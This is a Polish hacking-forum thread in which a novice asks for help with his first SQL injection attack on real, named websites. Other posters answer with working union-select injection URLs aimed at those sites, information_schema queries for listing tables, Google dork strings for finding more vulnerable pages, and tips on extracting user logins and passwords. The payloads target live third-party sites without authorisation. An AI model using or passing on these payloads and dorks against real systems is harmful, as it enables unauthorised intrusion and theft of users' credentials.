Sql Injection, mam podatność i error

[timpler]

Witam, dopiero uczę się ataku Sql Injection i znalazłem sobie stronke podatną na ten atak. Wpisałem polecenie: id=123123 (jakieś pierdoły) and 1=2 order by 5/* wyszukując liczby kolumn i wywaliło errora:

Query ' select * from ibf_topics where (last_post>1135616178 and 1=2 order by%2 /*) and (approved=1) and (forum_id = 1) order by last_post desc' failed with: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by%2 /*) and (approved=1) and (forum_id = 1) order by last_post desc' at line 2[/b]

bardzo ładny error tylko nie bardzo mogę zrozumieć o co mu chodzi. Znam anigelski, znam teraz także zapytanie do bazy, ale nie wiem co to znaczy? Że nie ma takiej liczby kolumn? Gdy wpisze order by 1 też wywala tego errora, o co chodzi?

 

[FDJ]

o order by.

 

[The]

Spróbuj z AND 1=2 union select 1, 2, 3, 4, 5/*

 

[timpler]

prosze bardz, oto co wywala po and 1=2 union select 1,2,3:

Query ' select * from ibf_topics where (last_post>1135616178 and 1=2 union select 1,2,3) and (approved=1) and (forum_id = 1) order by last_post desc' failed with: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3) and (approved=1) and (forum_id = 1) order by last_post' at line 2[/b]

To jak już jestem w temacie to popytam o coś jeszcze: widziałem gdzieś tylko już nie pamiętam gdzie jak w artykule autor pokazywał jak zdoybć nazwe tabeli. Było coś takiego: union select 1,2,3,4,5 from table_name where schema_table.schemas czy to dobre rozwiązanie? Czy poprawnie tego użyłem? Jak inaczej zdoybyć nazwe klasy?

 

[unlock]

sproboj id=-gt4er i bez and 1=2 to czasami daje efekt

select table_name from information_schema.tables <-wyciaga ci nazwa tabeli, column_name from information_schema.columns poszukaj o tym jeszcze

 

[timpler]

a co oznacza to polecenie: id=-gt4er??

 

[unlock]

to nie oznacza nic, wywolujemy tym blad zamiast 1=2, to byle co wpisane

 

[timpler]

kurde... nie wiem co mam zrobić. Chciałem przeprowadzić swój pierwszy atak SQL Injection i nie ma szans, dorwałem pare innych stronek ale też nigdzie nic nie moge sensownego zrobic...

 

[The]

timpler może podaj adres strony o którą Ci chodzi.

 

[abramakabra]

timpler ja bym ci polecił najpierw nauczyć się języka SQL a dopiero potem atakować bo nic z tego nie będzie...

 

[unlock]

inurl:"id=" & intext:"Warning: mysql_fetch_array():"

inurl:"id=" & intext:"Warning: mysql_num_rows()"

i szukaj, moze trafisz na jakas z prostszymi skryptami

 

[timpler]

abramakabra, SQL znam na poziomie... no... takim żebe mogę formować własne zapytania do bazy itd. sądze że tyle ile umiem starczy do SQL Injection'a... The oto adres: <a href="http://baatplassen.no/i/pda/news.php?x=1135616178%20and%201=2%20order%20by%2%20/*baatplassen.no" target="_blank">http://baatplassen.no/i/pda/news.php?x=1135616178 and 1=2 order by%2 /*
baatplassen.no://http://baatplassen.no/i/pda/news.ph...
baatplassen.no://http://baatplassen.no/i/pda/news.ph...
baatplassen.no://http://baatplassen.no/i/pda/news.ph...
baatplassen.no://http://baatplassen.no/i/pda/news.ph...
baatplassen.no://http://baatplassen.no/i/pda/news.ph...
baatplassen.no</a>

Jak uda się komuś wejść/włamać to prosiłbym aby wytłumaczył w miare kroczkowo jak mu się to udało bo ja nad tym siedziałem i nic nie moge zrobić...

 

[The]

Miałem chwile więc postanowiłem zerknąć na tę stronę. Oto co mi się udało napisać:

http://baatplassen.no/i/pda/news.php?x=1135616178) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from ibf_posts where post_date>1135616178/*

Teraz wiesz z którego miejsca wyświetlane są dane (z miejsca dwójki). Dalej próbuj sam

Ten mój adres skopiuj i wklej w pasek adresu bo będzie inny efekt działania jak naciśniesz na ten adres (Trochę mi się chyba pogmatwało xD)

 

[unlock]

http://baatplassen.no/i/pda/news.php?x=113...20offset%2012/*

tutaj juz mozesz elegancko wyciagac loginy i jak zgadniesz jak nazywaja sie hasla to i hasla (zgaduj w miejsce gwiazdki), skrocilem troche link The
aa btw, wyswietlanie zmieniaj offsetem

 

[timpler]

nooo dzięki tylko ja nie chce iść na łatwizne. Przydałoby się jaieś wyjaśnienie...

skąd zdobyliście np. nazwe ibf_posts,
post_date, dlaczego jest coś takiego: post_date>1135616178/* chodzi mi o to że ja nie chciałem od razu wyciągać loginów i haseł tylko chciałem jak najsamodzielniej przeprowadzić atak więc dziekuje wam za pomoc

Aha unlock co oznacza ten offset

 

[timpler]

witam ponownie, a co zrobić jeśli odkryłem ile strona ma kolumn (11) ale po odkryciu 11 nie pokazało żadnej cyfry (jak zawsze 2 lub 3) oto adres: http://www.praktyki.eurostudent.pl/index.php?danaofer=495
%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11/*

poprostu nigdzie nie ma tej cyfry, co to oznacza??

 

[sinis]

Może są w kodzie, a może w cale nie są printowane.

 

[unlock]

offsetem dajesz sobie ktora pozycje printujesz bo masz limit 1
te warunki ze znakiem mniejszosci/wiekszosci sa w bledzie zapytania i nie wiem dlaczego byly doklejane jak mozna je zakomentowac
jezeli nic sie nie printuje a masz pewnosc ze jest podatne to poczytaj o blind sql injection